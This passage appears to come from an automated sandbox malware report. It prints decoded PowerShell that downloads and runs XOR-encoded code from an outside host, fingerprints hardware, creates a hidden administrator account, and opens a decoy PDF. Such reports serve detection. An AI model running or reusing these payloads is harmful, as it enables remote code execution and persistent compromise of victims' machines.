      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680Thread sleep count: 9836 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep count: 9913 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1612Thread sleep count: 9847 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1612Thread sleep count: 46 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 9866 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\net1.exeLast function: Thread delayed
      Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: svczHost.exe, 00000011.00000002.4140957795.00000179E67BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: powershell.exe, 0000000A.00000002.3740096561.000001EE6D0D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000006.00000002.2978556216.0000022EFF73E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZm
      Source: powershell.exe, 00000002.00000002.3129564568.0000023D4470B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TExT.ENCoDiNg]::UTF8.GETStrING((iWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0Q=")))).Content))
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TExT.ENCoDiNg]::UTF8.GETStrING((iWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL0Q=")))).Content))Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8A4C.tmp" "c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAH